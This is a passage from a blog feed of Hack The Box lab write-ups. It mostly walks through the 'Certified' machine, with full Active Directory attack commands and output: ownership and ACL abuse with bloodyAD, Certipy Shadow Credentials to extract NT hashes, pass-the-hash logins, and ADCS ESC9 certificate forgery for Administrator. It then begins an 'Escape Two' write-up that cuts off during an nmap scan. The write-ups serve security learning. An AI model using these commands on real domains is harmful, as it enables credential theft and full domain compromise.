class="line">INFO: Compressing output into 20250224075146_bloodhound.zip</span><br><span class="line">➜  Certified unzip 20250224075146_bloodhound.zip </span><br><span class="line">Archive:  20250224075146_bloodhound.zip</span><br><span class="line"> extracting: 20250224075146_users.json  </span><br><span class="line"> extracting: 20250224075146_containers.json  </span><br><span class="line"> extracting: 20250224075146_gpos.json  </span><br><span class="line"> extracting: 20250224075146_groups.json  </span><br><span class="line"> extracting: 20250224075146_computers.json  </span><br><span class="line"> extracting: 20250224075146_ous.json  </span><br><span class="line"> extracting: 20250224075146_domains.json  </span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Certified/image.png"                      alt="User attack path"                ></p><h4 id="Attack-path"><a href="#Attack-path" class="headerlink" title="Attack path"></a>Attack path</h4><p><strong>BloodHound Findings &amp; Exploitation Path</strong></p><ul><li><code>JUDITH.MADER@CERTIFIED.HTB</code> → Can modify the owner of <code>MANAGEMENT@CERTIFIED.HTB</code>.</li><li><code>MANAGEMENT@CERTIFIED.HTB</code> → Has GenericWrite over <code>MANAGEMENT_SVC@CERTIFIED.HTB</code>.</li><li><code>MANAGEMENT_SVC@CERTIFIED.HTB</code> → Has GenericAll over <code>CA_OPERATOR@CERTIFIED.HTB</code>.</li></ul><p><strong>Attack Flow</strong></p><ul><li>Modify <code>MANAGEMENT@CERTIFIED.HTB</code> ownership to gain control.</li><li>Abuse GenericWrite to modify <code>MANAGEMENT_SVC</code> and escalate privileges.</li><li>Leverage GenericAll to take over <code>CA_OPERATOR</code>, potentially leading to further AD privilege escalation.</li></ul><p>The attack starts with <code>JUDITH.MADER</code>, who has the ability to change the owner of the Management group. By transferring ownership to that user, <code>JUDITH.MADER</code> gains full control over the group. Next, GenericAll permissions are granted to Management, allowing <code>JUDITH.MADER</code> to modify its members and add <code>JUDITH.MADER</code> to the group. Since Management group members have GenericWrite on Management_SVC, <code>JUDITH.MADER</code> can abuse this permission to perform a Shadow Credentials attack. Using Certipy, <code>JUDITH.MADER</code> can add a malicious Key Credential to Management_SVC, retrieves a TGT &amp; NT hash, and authenticates as that user. Finally, since Management_SVC has GenericAll over CA_Operator, <code>JUDITH.MADER</code> can take full control of CA_Operator.</p><h3 id="User"><a href="#User" class="headerlink" title="User"></a>User</h3><p>Change Ownership of the Management Group:<br>→ Transfers ownership of the Management group to judith.mader, allowing full control over the group.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified owneredit.py -action write -new-owner &#x27;judith.mader&#x27; -target &#x27;management&#x27; &#x27;certified.htb&#x27;/&#x27;judith.mader&#x27;:&#x27;judith09&#x27;        </span><br><span class="line">Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Current owner information below</span><br><span class="line">[*] - SID: S-1-5-21-729746778-2675978091-3820388244-1103</span><br><span class="line">[*] - sAMAccountName: judith.mader</span><br><span class="line">[*] - distinguishedName: CN=Judith Mader,CN=Users,DC=certified,DC=htb</span><br><span class="line">[*] OwnerSid modified successfully!</span><br></pre></td></tr></table></figure></div><p>Grant Full Control Over Management Group:<br>→ Gives judith.mader GenericAll (full control) over management group.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified bloodyAD --host &quot;certified.htb&quot; -d certified.htb -u judith.mader -p judith09 add genericAll &quot;management&quot; &quot;judith.mader&quot;</span><br><span class="line">[+] judith.mader has now GenericAll on management</span><br></pre></td></tr></table></figure></div><p>Add Judith to Management Group:<br>→ Adds judith.mader as a member of management group.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified bloodyAD --host &quot;certified.htb&quot; -d certified.htb -u judith.mader -p judith09 add groupMember &quot;management&quot; &quot;judith.mader&quot;</span><br><span class="line"></span><br><span class="line">[+] judith.mader added to management</span><br></pre></td></tr></table></figure></div><p>Perform Shadow Credentials Attack on Management_SVC:<br>→ Adds a new Key Credential to management_svc, authenticates using PKINIT, retrieves its TGT &amp; NT hash, and restores the original Key Credential.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified certipy shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc </span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Targeting user &#x27;management_svc&#x27;</span><br><span class="line">[*] Generating certificate</span><br><span class="line">[*] Certificate generated</span><br><span class="line">[*] Generating Key Credential</span><br><span class="line">[*] Key Credential generated with DeviceID &#x27;9623dcf6-e631-fbad-dd02-e8f4cbe03f88&#x27;</span><br><span class="line">[*] Adding Key Credential with device ID &#x27;9623dcf6-e631-fbad-dd02-e8f4cbe03f88&#x27; to the Key Credentials for &#x27;management_svc&#x27;</span><br><span class="line">[*] Successfully added Key Credential with device ID &#x27;9623dcf6-e631-fbad-dd02-e8f4cbe03f88&#x27; to the Key Credentials for &#x27;management_svc&#x27;</span><br><span class="line">[*] Authenticating as &#x27;management_svc&#x27; with the certificate</span><br><span class="line">[*] Using principal: management_svc@certified.htb</span><br><span class="line">[*] Trying to get TGT...</span><br><span class="line">[*] Got TGT</span><br><span class="line">[*] Saved credential cache to &#x27;management_svc.ccache&#x27;</span><br><span class="line">[*] Trying to retrieve NT hash for &#x27;management_svc&#x27;</span><br><span class="line">[*] Restoring the old Key Credentials for &#x27;management_svc&#x27;</span><br><span class="line">[*] Successfully restored the old Key Credentials for &#x27;management_svc&#x27;</span><br><span class="line">[*] NT hash for &#x27;management_svc&#x27;: a091c1832bcdd4677c28b5a6a1295584</span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified nxc smb certified.htb -u management_Svc -H a091c1832bcdd4677c28b5a6a1295584                               </span><br><span class="line">SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.41     445    DC01             [+] certified.htb\management_Svc:a091c1832bcdd4677c28b5a6a1295584 </span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><p>Now we can use Evil-WinRM to login to machine.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified evil-winrm -i certified.htb -u management_Svc -H a091c1832bcdd4677c28b5a6a1295584                                </span><br><span class="line">                                        </span><br><span class="line">Evil-WinRM shell v3.7</span><br><span class="line">                                        </span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine</span><br><span class="line">                                        </span><br><span class="line">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span><br><span class="line">                                        </span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">*Evil-WinRM* PS C:\Users\management_svc\Documents&gt; </span><br></pre></td></tr></table></figure></div><h3 id="Root"><a href="#Root" class="headerlink" title="Root"></a>Root</h3><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Certified/root.png"                      alt="Root attack path"                ></p><p>The user <code>MANAGEMENT_SVC@CERTIFIED.HTB</code> has GenericAll privileges to the user <code>CA_OPERATOR@CERTIFIED.HTB</code>.<br>With <code>Management_SVC</code> having GenericAll on CA_Operator, we fully control the account. Using the NT hash from Shadow Credentials, we authenticate as CA_Operator.</p><p>→ Exploits Shadow Credentials to take over CA_OPERATOR using Certipy.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified certipy shadow auto -u management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator                                        </span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Targeting user &#x27;ca_operator&#x27;</span><br><span class="line">[*] Generating certificate</span><br><span class="line">[*] Certificate generated</span><br><span class="line">[*] Generating Key Credential</span><br><span class="line">[*] Key Credential generated with DeviceID &#x27;4f17b9c2-939a-7851-82be-1e3eb5190ffe&#x27;</span><br><span class="line">[*] Adding Key Credential with device ID &#x27;4f17b9c2-939a-7851-82be-1e3eb5190ffe&#x27; to the Key Credentials for &#x27;ca_operator&#x27;</span><br><span class="line">[*] Successfully added Key Credential with device ID &#x27;4f17b9c2-939a-7851-82be-1e3eb5190ffe&#x27; to the Key Credentials for &#x27;ca_operator&#x27;</span><br><span class="line">[*] Authenticating as &#x27;ca_operator&#x27; with the certificate</span><br><span class="line">[*] Using principal: ca_operator@certified.htb</span><br><span class="line">[*] Trying to get TGT...</span><br><span class="line">[*] Got TGT</span><br><span class="line">[*] Saved credential cache to &#x27;ca_operator.ccache&#x27;</span><br><span class="line">[*] Trying to retrieve NT hash for &#x27;ca_operator&#x27;</span><br><span class="line">[*] Restoring the old Key Credentials for &#x27;ca_operator&#x27;</span><br><span class="line">[*] Successfully restored the old Key Credentials for &#x27;ca_operator&#x27;</span><br><span class="line">[*] NT hash for &#x27;ca_operator&#x27;: 259745cb123a52aa2e693aaacca2db52</span><br></pre></td></tr></table></figure></div><p>→ Extracts NT hash of CA_OPERATOR, enabling pass-the-hash authentication.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified nxc smb certified.htb -u ca_operator -H 259745cb123a52aa2e693aaacca2db52                        </span><br><span class="line">SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.41     445    DC01             [+] certified.htb\ca_operator:259745cb123a52aa2e693aaacca2db52 </span><br></pre></td></tr></table></figure></div><h4 id="ESC-9-vulnerabilty-exploitation"><a href="#ESC-9-vulnerabilty-exploitation" class="headerlink" title="ESC-9 vulnerabilty exploitation"></a>ESC-9 vulnerabilty exploitation</h4><p>By using certipy i saw that there is an ADCS ESC9 vuln</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified certipy find -dc-ip 10.10.11.41 -u ca_operator -hashes :259745cb123a52aa2e693aaacca2db52 -vulnerable -stdout</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Finding certificate templates</span><br><span class="line">[*] Found 34 certificate templates</span><br><span class="line">[*] Finding certificate authorities</span><br><span class="line">[*] Found 1 certificate authority</span><br><span class="line">[*] Found 12 enabled certificate templates</span><br><span class="line">[*] Trying to get CA configuration for &#x27;certified-DC01-CA&#x27; via CSRA</span><br><span class="line">[!] Got error while trying to get CA configuration for &#x27;certified-DC01-CA&#x27; via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.</span><br><span class="line">[*] Trying to get CA configuration for &#x27;certified-DC01-CA&#x27; via RRP</span><br><span class="line">[*] Got CA configuration for &#x27;certified-DC01-CA&#x27;</span><br><span class="line">[*] Enumeration output:</span><br><span class="line">Certificate Authorities</span><br><span class="line">  0</span><br><span class="line">    CA Name                             : certified-DC01-CA</span><br><span class="line">    DNS Name                            : DC01.certified.htb</span><br><span class="line">    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb</span><br><span class="line">    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D</span><br><span class="line">    Certificate Validity Start          : 2024-05-13 15:33:41+00:00</span><br><span class="line">    Certificate Validity End            : 2124-05-13 15:43:41+00:00</span><br><span class="line">    Web Enrollment                      : Disabled</span><br><span class="line">    User Specified SAN                  : Disabled</span><br><span class="line">    Request Disposition                 : Issue</span><br><span class="line">    Enforce Encryption for Requests     : Enabled</span><br><span class="line">    Permissions</span><br><span class="line">      Owner                             : CERTIFIED.HTB\Administrators</span><br><span class="line">      Access Rights</span><br><span class="line">        ManageCertificates              : CERTIFIED.HTB\Administrators</span><br><span class="line">                                          CERTIFIED.HTB\Domain Admins</span><br><span class="line">                                          CERTIFIED.HTB\Enterprise Admins</span><br><span class="line">        ManageCa                        : CERTIFIED.HTB\Administrators</span><br><span class="line">                                          CERTIFIED.HTB\Domain Admins</span><br><span class="line">                                          CERTIFIED.HTB\Enterprise Admins</span><br><span class="line">        Enroll                          : CERTIFIED.HTB\Authenticated Users</span><br><span class="line">Certificate Templates</span><br><span class="line">  0</span><br><span class="line">    Template Name                       : CertifiedAuthentication</span><br><span class="line">    Display Name                        : Certified Authentication</span><br><span class="line">    Certificate Authorities             : certified-DC01-CA</span><br><span class="line">    Enabled                             : True</span><br><span class="line">    Client Authentication               : True</span><br><span class="line">    Enrollment Agent                    : False</span><br><span class="line">    Any Purpose                         : False</span><br><span class="line">    Enrollee Supplies Subject           : False</span><br><span class="line">    Certificate Name Flag               : SubjectRequireDirectoryPath</span><br><span class="line">                                          SubjectAltRequireUpn</span><br><span class="line">    Enrollment Flag                     : NoSecurityExtension</span><br><span class="line">                                          AutoEnrollment</span><br><span class="line">                                          PublishToDs</span><br><span class="line">    Private Key Flag                    : 16842752</span><br><span class="line">    Extended Key Usage                  : Server Authentication</span><br><span class="line">                                          Client Authentication</span><br><span class="line">    Requires Manager Approval           : False</span><br><span class="line">    Requires Key Archival               : False</span><br><span class="line">    Authorized Signatures Required      : 0</span><br><span class="line">    Validity Period                     : 1000 years</span><br><span class="line">    Renewal Period                      : 6 weeks</span><br><span class="line">    Minimum RSA Key Length              : 2048</span><br><span class="line">    Permissions</span><br><span class="line">      Enrollment Permissions</span><br><span class="line">        Enrollment Rights               : CERTIFIED.HTB\operator ca</span><br><span class="line">                                          CERTIFIED.HTB\Domain Admins</span><br><span class="line">                                          CERTIFIED.HTB\Enterprise Admins</span><br><span class="line">      Object Control Permissions</span><br><span class="line">        Owner                           : CERTIFIED.HTB\Administrator</span><br><span class="line">        Write Owner Principals          : CERTIFIED.HTB\Domain Admins</span><br><span class="line">                                          CERTIFIED.HTB\Enterprise Admins</span><br><span class="line">                                          CERTIFIED.HTB\Administrator</span><br><span class="line">        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins</span><br><span class="line">                                          CERTIFIED.HTB\Enterprise Admins</span><br><span class="line">                                          CERTIFIED.HTB\Administrator</span><br><span class="line">        Write Property Principals       : CERTIFIED.HTB\Domain Admins</span><br><span class="line">                                          CERTIFIED.HTB\Enterprise Admins</span><br><span class="line">                                          CERTIFIED.HTB\Administrator</span><br><span class="line">    [!] Vulnerabilities</span><br><span class="line">      ESC9                              : &#x27;CERTIFIED.HTB\\operator ca&#x27; can enroll and template has no security extension</span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><p>Now we can modify UPN of CA_OPERATOR to Administrator, enabling certificate forgery.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator -debug </span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[+] Trying to resolve &#x27;CERTIFIED.HTB&#x27; at &#x27;192.168.18.2&#x27;</span><br><span class="line">[+] Resolved &#x27;CERTIFIED.HTB&#x27; from cache: 10.10.11.41</span><br><span class="line">[+] Authenticating to LDAP server</span><br><span class="line">[+] Bound to ldaps://10.10.11.41:636 - ssl</span><br><span class="line">[+] Default path: DC=certified,DC=htb</span><br><span class="line">[+] Configuration path: CN=Configuration,DC=certified,DC=htb</span><br><span class="line">[*] Updating user &#x27;ca_operator&#x27;:</span><br><span class="line">    userPrincipalName                   : administrator</span><br><span class="line">[*] Successfully updated &#x27;ca_operator&#x27;</span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><p>Requesting an Administrator Certificate via Certipy</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified certipy req -username ca_operator@certified.htb -hashes :259745cb123a52aa2e693aaacca2db52 -ca certified-DC01-CA -template CertifiedAuthentication -target 10.10.11.41 -debug</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[+] Trying to resolve &#x27;CERTIFIED.HTB&#x27; at &#x27;192.168.18.2&#x27;</span><br><span class="line">[+] Generating RSA key</span><br><span class="line">[*] Requesting certificate via RPC</span><br><span class="line">[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]</span><br><span class="line">[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]</span><br><span class="line">[*] Successfully requested certificate</span><br><span class="line">[*] Request ID is 46</span><br><span class="line">[*] Got certificate with UPN &#x27;administrator&#x27;</span><br><span class="line">[*] Certificate has no object SID</span><br><span class="line">[*] Saved certificate and private key to &#x27;administrator.pfx&#x27;</span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><p>Now we can obtain a TGT and NT Hash Using the Administrator Certificate</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified certipy auth -pfx administrator.pfx -domain certified.htb</span><br><span class="line"></span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Using principal: administrator@certified.htb</span><br><span class="line">[*] Trying to get TGT...</span><br><span class="line">[*] Got TGT</span><br><span class="line">[*] Saved credential cache to &#x27;administrator.ccache&#x27;</span><br><span class="line">[*] Trying to retrieve NT hash for &#x27;administrator&#x27;</span><br><span class="line">[*] Got hash for &#x27;administrator@certified.htb&#x27;: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34</span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><p>Successfully Authenticating as Administrator on the Domain Controller</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified nxc smb certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34</span><br><span class="line">SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.41     445    DC01             [+] certified.htb\administrator:0d5b49608bbce1751f708748f67e2d34 (Pwn3d!)</span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Hack The Box" scheme="http://example.com/categories/Hack-The-Box/"/>
    
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Hack The Box" scheme="http://example.com/tags/Hack-The-Box/"/>
    
    <category term="Impacket" scheme="http://example.com/tags/Impacket/"/>
    
    <category term="Certipy" scheme="http://example.com/tags/Certipy/"/>
    
    <category term="ADCS" scheme="http://example.com/tags/ADCS/"/>
    
    <category term="ESC-9" scheme="http://example.com/tags/ESC-9/"/>
    
  </entry>
  
  <entry>
    <title>Escape Two - HackTheBox</title>
    <link href="http://example.com/2025/02/24/Escape-Two/"/>
    <id>http://example.com/2025/02/24/Escape-Two/</id>
    <published>2025-02-24T11:51:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><p>Using <code>rose</code>‘s SMB credentials on DC01, we accessed and extracted credentials from accounts.xlsx, including the MSSQL sa account. With <code>mssqlclient.py</code>, we enabled xp_cmdshell and obtained a shell as <code>sql_svc</code>.<br>From <code>sql-Configuration.INI</code>, we recovered plaintext credentials for <code>sql_svc</code> and <code>sa</code>. SMB enumeration revealed domain users, enabling a successful password spray attack as <code>ryan</code>. Using WinRM, we retrieved user.txt.<br>Privilege escalation via AD CS ESC4 exploited ryan’s <code>Write Owner</code> over <code>CA_SVC</code>. We modified ownership, granted <code>GenericAll</code>, and performed a Shadow Credentials attack to retrieve <code>CA_SVC</code>‘s NT hash. Finally, by setting Administrator’s UPN and using certipy auth, we obtained the NT hash, achieving full domain compromise.</p><h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h3><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo nmap -sCV 10.10.11.51 -v</span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-24 11:05 EST</span><br><span class="line">NSE: Loaded 157 scripts for scanning.</span><br><span class="line">NSE: Script Pre-scanning.</span><br><span class="line">Initiating NSE at 11:05</span><br><span class="line">Completed NSE at 11:05, 0.00s elapsed</span><br><span class="line">Initiating NSE at 11:05</span><br><span class="line">Completed NSE at 11:05, 0.00s elapsed</span><br><span class="line">Initiating NSE at 11:05</span><br><span class="line">Completed NSE at 11:05, 0.00s elapsed</span><br><span class="line">Initiating Ping Scan at 11:05</span><br><span class="line">Scanning 10.10.11.51 [4 ports]</span><br><span class="line">Completed Ping Scan at 11:05, 0.43s elapsed (1 total hosts)</span><br><span class="line">Initiating Parallel DNS resolution of 1 host. at 11:05</span><br><span class="line">Completed Parallel DNS resolution of 1 host. at 